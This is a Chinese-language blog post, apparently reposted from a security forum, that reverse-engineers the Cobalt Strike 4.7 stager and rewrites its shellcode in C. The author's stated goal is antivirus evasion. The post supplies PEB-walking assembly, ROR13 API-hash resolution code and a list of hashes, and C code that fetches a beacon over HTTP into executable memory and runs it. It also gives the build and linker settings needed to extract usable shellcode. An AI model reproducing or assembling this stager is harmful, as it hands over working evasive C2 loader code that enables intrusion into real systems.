CS 4.7 Stager 逆向及 Shellcode 重写

CS 4.7 Stager 逆向及 Shellcode 重写
2023-2-21 11:54:0 Author: xz.aliyun.com(查看原文) 阅读量:45 收藏

1. 概述

一直很想有一个自己的控，奈何实力不允许，CS 仍然是目前市面上最好用的控，但是也被各大厂商盯得很紧，通过加载器的方式进行免杀效果有限，后来看到有人用 go 重写了 CS 的 beacon，感觉这个思路很好，但是 go 编译的也有很多问题，加载起来会有很多受限的地方，所以想着能不能用 C 去重写一个，不过 beacon 的功能很多，短时间去重写有点费劲，所以想先重写 CS 的 stager 部分，并能转化成 shellcode 通过加载器进行加载。CS 4.7出来有段时间了，本文尝试对 CS 的 stager 进行逆向，并尝试用 C 重写 stager 的 shellcode 。

2. 样本信息

样本名：artifact.exe （通过CS的Windows Stager Payload生成的64位exe）

3. Stager 逆向

CS 生成的 exe 格式的 stager 本质上就是一个 shellcode 加载器，真正实现 stager 的拉取 beacon 功能的是其中的 shellcode 部分，因为加载器我们可以通过很多方式去实现，且4.7版本的 stager 加载流程并没有较大变化，所以对 stager 的加载部分只做简单的分析。

3.1 Shellcode加载部分：

进入主函数，直接进 sub_4017F8 函数看它的功能实现：

进入 sub_4017F8 函数，先获取系统时间戳，然后创建线程通过管道读取 shellcode 并执行：

拼接的管道名：\\.\pipe\MSSE-3410-server：

跟进 CreateThread 中的线程执行函数：

跟进 WriteShellcodeToPipe_401630，创建管道并循环写入 shellcode：

shellcode 内容如下：

写入 shellcode：

跟进 ShellcodeExec_4017A6 函数，该函数实现从管道接收 shellcode 并解密执行：

从管道中读取 shellcode 到内存：

将读取到的 shellcode 在 DecryptAndExecShellcode_401595 函数中解密执行：

解密后的 shellcode 可以通过 CreateThread 的传参找到，起始地址保存在 R9 寄存器中：

3.2 Shellcode执行部分：

Shellcode 是一段地址无关代码，不能直接调用 Win32Api，CS 的 shellcode 是通过遍历 PEB 结构和 PE 文件导出表并根据导出函数的 hash 值查找需要的模块和 API 函数：

3.2.1 遍历PEB获取Win32API

遍历PEB：

计算模块哈希：

查找导出函数：

该部分的完整汇编如下：

| mov rdx,qword ptr gs:[rdx+60]      | 查找PEB
| mov rdx,qword ptr ds:[rdx+18]      | 查找LDR链表
| mov rdx,qword ptr ds:[rdx+20]      | 访问InMemoryOrderModuleList链表
| mov rsi,qword ptr ds:[rdx+50]      | 将模块名称存入rsi寄存器
| movzx rcx,word ptr ds:[rdx+4A]     | 将模块名称长度存入rcx寄存器（unicode）
| xor r9,r9                          | 
| xor rax,rax                        |
| lodsb                              | 逐字符读入模块名称
| cmp al,61                          | 判断大小写
| jl A0037                           | 大写则跳转
| sub al,20                          | 如果是小写就转换为大写
| ror r9d,D                          | ROR13加密计算
| add r9d,eax                        | 将计算得到的hash值存入R9寄存器
| loop A002D                         | 循环计算
| push rdx                           |
| push r9                            | 
| mov rdx,qword ptr ds:[rdx+20]      | 找到模块基地址
| mov eax,dword ptr ds:[rdx+3C]      | 找到0x3C偏移（PE标识）
| add rax,rdx                        | rax指向PE标识
| cmp word ptr ds:[rax+18],20B       | 判断OptionHeader结构的Magic为是否为20B（PE32+）
| jne A00C7                          |
| mov eax,dword ptr ds:[rax+88]      | 将导出表RVA赋值给eax寄存器
| test rax,rax                       |
| je A00C7                           |
| add rax,rdx                        | 模块基址+导出表RVA=导出表VA
| push rax                           |
| mov ecx,dword ptr ds:[rax+18]      | 将导出函数的数量赋值给ecx寄存器
| mov r8d,dword ptr ds:[rax+20]      | 将导出函数的起始RVA赋值给R8寄存器
| add r8,rdx                         | 导出函数的起始VA
| jrcxz A00C6                        |
| dec rcx                            |
| mov esi,dword ptr ds:[r8+rcx*4]    | 从后向前获取导出函数的RVA
| add rsi,rdx                        | 当前导出函数的VA
| xor r9,r9                          | 
| xor rax,rax                        |
| lodsb                              | 逐字符读入导出函数名
| ror r9d,D                          | ROR13加密运算
| add r9d,eax                        | 计算的hash存入R9
| cmp al,ah                          | 字符串最后一位为0，此时al、ah均为0，循环结束
| jne A007D                          | 不为0，继续运算
| add r9,qword ptr ss:[rsp+8]        | 将模块hash与函数hash求和
| cmp r9d,r10d                       | 运算结果与要查找的函数hash（R10）进行比较
| jne A006E                          | 没找到则跳回去继续找
| pop rax                            |

之后会不断循环上面的代码通过hash依次查找以下Api函数：

0x0726774C => LoadLibraryA
0xA779563A => InternetOpenA
0xC69F8957 => InternetConnectA
0x3B2E55EB => HttpOpenRequestA
0x7B18062D => HttpSendRequestA
0xE553A458 => VirtualAlloc
0xE2899612 => InternetReadFile

3.2.2 请求C2服务器建立连接

调用 LoadLibraryA 加载 wininet.dll：

调用 InternetOpenA 进行初始化：

调用 InternetConnectA 与控制端建立 http 会话：

调用 HttpOpenRequestA 创建 http 请求：

调用 HttpSendRequestA 将指定请求发送到服务器：

3.2.3 获取Beacon加载上线

调用 VirtualAlloc 为 beacon 分配内存：

循环调用 InternetReadFile 将 beacon 读取到分配的内存：

跳转，进入 beacon 的内存空间：

之后，beacon 会解密自身，通过反射式DLL注入执行上线，不在本篇范围，故不赘述。

4. C 重写 Shellcode

通过前面的内容我们已经了解了 CS 的 stager 的基本功能，其中 shellcode 部分通过调用 wininet.dll 中的相关 API 函数向 C2 服务器发起 http 请求并建立连接，远程读取 beacon 的内容并为其分配内存后跳转执行，在 C 里面，我们只需要调用相同的 API 函数即可实现相同的功能。

然而，我们的目的是希望用 C 编写出来的代码可以转化为 shellcode，这样既可以保留 shellcode 灵活加载的优势，也可以通过编写 C 代码自由地控制 shellcode（汇编大佬勿cue）。因为 shellcode 是一段地址无关代码，我们不能像编译一个可执行文件那样直接调用 Windows API，这就是为什么 CS 的 shellcode 会有一段代码通过遍历 PEB 和导出表来获取所需的 Windows API 函数。

理清了思路，剩下的就是写代码了，下面给出关键代码。

4.1 Shellcode的代码实现

4.1.1 遍历PEB获取Win32API

这个部分已经有很多代码实例了，直接拿来 include 就可以：

#include <windows.h>
#include <winternl.h>

// This compiles to a ROR instruction
// This is needed because _lrotr() is an external reference
// Also, there is not a consistent compiler intrinsic to accomplish this across all three platforms.
#define ROTR32(value, shift) (((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))

// Redefine PEB structures. The structure definitions in winternl.h are incomplete.
typedef struct _MY_PEB_LDR_DATA {
    ULONG Length;
 BOOL Initialized;
 PVOID SsHandle;
 LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
 LIST_ENTRY InInitializationOrderModuleList;
} MY_PEB_LDR_DATA, *PMY_PEB_LDR_DATA;

typedef struct _MY_LDR_DATA_TABLE_ENTRY
{
 LIST_ENTRY InLoadOrderLinks;
 LIST_ENTRY InMemoryOrderLinks;
 LIST_ENTRY InInitializationOrderLinks;
 PVOID DllBase;
 PVOID EntryPoint;
 ULONG SizeOfImage;
 UNICODE_STRING FullDllName;
 UNICODE_STRING BaseDllName;
} MY_LDR_DATA_TABLE_ENTRY, *PMY_LDR_DATA_TABLE_ENTRY;

HMODULE GetProcAddressWithHash( _In_ DWORD dwModuleFunctionHash )
{
 PPEB PebAddress;
 PMY_PEB_LDR_DATA pLdr;
 PMY_LDR_DATA_TABLE_ENTRY pDataTableEntry;
 PVOID pModuleBase;
 PIMAGE_NT_HEADERS pNTHeader;
 DWORD dwExportDirRVA;
 PIMAGE_EXPORT_DIRECTORY pExportDir;
 PLIST_ENTRY pNextModule;
 DWORD dwNumFunctions;
 USHORT usOrdinalTableIndex;
 PDWORD pdwFunctionNameBase;
 PCSTR pFunctionName;
 UNICODE_STRING BaseDllName;
 DWORD dwModuleHash;
 DWORD dwFunctionHash;
 PCSTR pTempChar;
 DWORD i;

#if defined(_WIN64)
 PebAddress = (PPEB) __readgsqword( 0x60 );
#elif defined(_M_ARM)
 // I can assure you that this is not a mistake. The C compiler improperly emits the proper opcodes
 // necessary to get the PEB.Ldr address
 PebAddress = (PPEB) ( (ULONG_PTR) _MoveFromCoprocessor(15, 0, 13, 0, 2) + 0);
 __emit( 0x00006B1B );
#else
 PebAddress = (PPEB) __readfsdword( 0x30 );
#endif

 pLdr = (PMY_PEB_LDR_DATA) PebAddress->Ldr;
 pNextModule = pLdr->InLoadOrderModuleList.Flink;
 pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pNextModule;

 while (pDataTableEntry->DllBase != NULL)
 {
  dwModuleHash = 0;
  pModuleBase = pDataTableEntry->DllBase;
  BaseDllName = pDataTableEntry->BaseDllName;
  pNTHeader = (PIMAGE_NT_HEADERS) ((ULONG_PTR) pModuleBase + ((PIMAGE_DOS_HEADER) pModuleBase)->e_lfanew);
  dwExportDirRVA = pNTHeader->OptionalHeader.DataDirectory[0].VirtualAddress;

  // Get the next loaded module entry
  pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pDataTableEntry->InLoadOrderLinks.Flink;

  // If the current module does not export any functions, move on to the next module.
  if (dwExportDirRVA == 0)
  {
   continue;
  }

  // Calculate the module hash
  for (i = 0; i < BaseDllName.MaximumLength; i++)
  {
   pTempChar = ((PCSTR) BaseDllName.Buffer + i);

   dwModuleHash = ROTR32( dwModuleHash, 13 );

   if ( *pTempChar >= 0x61 )
   {
    dwModuleHash += *pTempChar - 0x20;
   }
   else
   {
    dwModuleHash += *pTempChar;
   }
  }

  pExportDir = (PIMAGE_EXPORT_DIRECTORY) ((ULONG_PTR) pModuleBase + dwExportDirRVA);

  dwNumFunctions = pExportDir->NumberOfNames;
  pdwFunctionNameBase = (PDWORD) ((PCHAR) pModuleBase + pExportDir->AddressOfNames);

  for (i = 0; i < dwNumFunctions; i++)
  {
   dwFunctionHash = 0;
   pFunctionName = (PCSTR) (*pdwFunctionNameBase + (ULONG_PTR) pModuleBase);
   pdwFunctionNameBase++;

   pTempChar = pFunctionName;

   do
   {
    dwFunctionHash = ROTR32( dwFunctionHash, 13 );
    dwFunctionHash += *pTempChar;
    pTempChar++;
   } while (*(pTempChar - 1) != 0);

   dwFunctionHash += dwModuleHash;

   if (dwFunctionHash == dwModuleFunctionHash)
   {
    usOrdinalTableIndex = *(PUSHORT)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfNameOrdinals) + (2 * i));
    return (HMODULE) ((ULONG_PTR) pModuleBase + *(PDWORD)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfFunctions) + (4 * usOrdinalTableIndex)));
   }
  }
 }

 // All modules have been exhausted and the function was not found.
 return NULL;
}

在引用了以上代码后，我们还需要定义我们所需的 API 函数，这里我们尝试使用其它 API 进行测试：

typedef HMODULE(WINAPI* FN_LoadLibraryA)(
    _In_ LPCSTR lpLibFileName
    );

typedef LPVOID(WINAPI* FN_VirtualAlloc)(
    _In_opt_ LPVOID lpAddress,
    _In_ SIZE_T dwSize,
    _In_ DWORD flAllocationType,
    _In_ DWORD flProtect
    );

typedef LPVOID(WINAPI* FN_InternetOpenA)(
    _In_ LPCSTR lpszAgent,
    _In_ DWORD dwAccessType,
    _In_ LPCSTR lpszProxy,
    _In_ LPCSTR lpszProxyBypass,
    _In_ DWORD dwFlags
    );

typedef HANDLE(WINAPI* FN_InternetOpenUrlA)(
    _In_ LPVOID hInternet,
    _In_ LPCSTR lpszUrl,
    _In_ LPCSTR lpszHeaders,
    _In_ DWORD dwHeadersLength,
    _In_ DWORD dwFlags,
    _In_ DWORD_PTR dwContext
    );

typedef BOOL(WINAPI* FN_InternetReadFile)(
    _In_ LPVOID hFile,
    _Out_ LPVOID lpBuffer,
    _In_ DWORD dwNumberOfBytesToRead,
    _Out_ LPDWORD lpdwNumberOfBytesRead
    );

typedef struct tagApiInterface {
    FN_LoadLibraryA pfnLoadLibrary;
    FN_VirtualAlloc pfnVirtualAlloc;
    FN_InternetOpenA pfnInternetOpenA;
    FN_InternetOpenUrlA pfnInternetOpenUrlA;
    FN_InternetReadFile pfnInternetReadFile;
}APIINTERFACE, * PAPIINTERFACE;

现在我们已经有了定义好的函数和 GetProcAddressWithHash 函数，接下来只需要通过 hash 寻找我们需要的函数即可：

#pragma warning( push )
#pragma warning( disable : 4055 )
    ai.pfnLoadLibrary = (FN_LoadLibraryA)GetProcAddressWithHash(0x0726774C);
    ai.pfnLoadLibrary(szWininet);
    ai.pfnLoadLibrary(szUser32);

    ai.pfnVirtualAlloc      = (FN_VirtualAlloc)GetProcAddressWithHash(0xE553A458);
    ai.pfnInternetOpenA     = (FN_InternetOpenA)GetProcAddressWithHash(0xA779563A);
    ai.pfnInternetOpenUrlA  = (FN_InternetOpenUrlA)GetProcAddressWithHash(0xF07A8777);
    ai.pfnInternetReadFile  = (FN_InternetReadFile)GetProcAddressWithHash(0xE2899612);
#pragma warning( pop )

4.1.2 建立连接接收Beacon

LPVOID hInternet = ai.pfnInternetOpenA(0, 0, NULL, 0, NULL);
HANDLE hInternetOpenUrl = ai.pfnInternetOpenUrlA(hInternet, HttpURL, NULL, 0, 0x80000000, 0);
LPVOID addr = ai.pfnVirtualAlloc(0, 0x400000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

recv_tmp = 1;
recv_tot = 0;
beacon_index = addr;

while (recv_tmp > 0) {
    ai.pfnInternetReadFile(hInternetOpenUrl, beacon_index, 8192, (PDWORD)&recv_tmp);
    recv_tot += recv_tmp;
    beacon_index += recv_tmp;
}

((void(*)())addr)();

4.1.3 64位下的代码调整

为了保证我们的 shellcode 在64位上以正确的堆栈对齐方式达到其入口点，我们需要编写一个保证对齐的 asm 存根，并将其生成的对象文件作为链接器的附加依赖项：

EXTRN ExecutePayload:PROC
PUBLIC  AlignRSP   ; Marking AlignRSP as PUBLIC allows for the function
     ; to be called as an extern in our C code.

_TEXT SEGMENT

; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior
; to calling the entry point of the payload. This is necessary because 64-bit functions
; in Windows assume that they were called with 16-byte stack alignment. When amd64
; shellcode is executed, you can't be assured that you stack is 16-byte aligned. For example,
; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely
; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte)
; alignment.

AlignRSP PROC
 push rsi    ; Preserve RSI since we're stomping on it
 mov  rsi, rsp  ; Save the value of RSP so it can be restored
 and  rsp, 0FFFFFFFFFFFFFFF0h ; Align RSP to 16 bytes
 sub  rsp, 020h  ; Allocate homing space for ExecutePayload
 call ExecutePayload ; Call the entry point of the payload
 mov  rsp, rsi  ; Restore the original value of RSP
 pop  rsi    ; Restore RSI
 ret      ; Return to caller
AlignRSP ENDP

_TEXT ENDS

END

我们还需要一个头文件帮助我们调用上面的汇编函数：

#if defined(_WIN64)
extern VOID AlignRSP( VOID );

VOID Begin( VOID )
{
 // Call the ASM stub that will guarantee 16-byte stack alignment.
 // The stub will then call the ExecutePayload.
 AlignRSP();
}
#endif

4.1.4 其它坑点

（1）传入一些字符串参数时需要使用字符数组的形式；

（2）传入的字符串不能过长，太长的话会被编译器分配到别的区段导致提取的 shellcode 找不到其地址；

（3）如果 CS 使用默认的 profile，注意 URL 应满足 CS 的检查要求（checksum8）；

4.2 修改VSStudio配置

在写好代码后，为了从我们编译生成的 exe 文件中提取出可以使用的 shellcode，我们还需要修改 VS 的部分配置选项：

编译器：

/GS- /TC /GL /W4 /O1 /nologo /Zl /FA /Os

链接器：

/LTCG "x64\Release\AdjustStack.obj" /ENTRY:"Begin" /OPT:REF /SAFESEH:NO

/SUBSYSTEM:CONSOLE /MAP /ORDER:@"function_link_order64.txt" /OPT:ICF /NOLOGO

/NODEFAULTLIB

其中 AdjustStack.obj 是我们上面提到的对象文件，function_link_order64.txt 是我们指定的链接顺序，其内容如下：

Begin                       // 入口函数
GetProcAddressWithHash
ExecutePayload  // shellcode 功能函数

4.3 提取shellcode上线

配置好相关选项后，构建项目生成 exe，然后提取 .text 段就可以拿到我们的 shellcode 了：

使用一个简单的加载器进行测试，可成功上线：

5. 参考链接

https://bbs.kanxue.com/thread-264470.htm#msg_header_h2_0

https://web.archive.org/web/20210305190309/http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html

文章来源: https://xz.aliyun.com/t/12194
如有侵权请联系:admin#unsafe.sh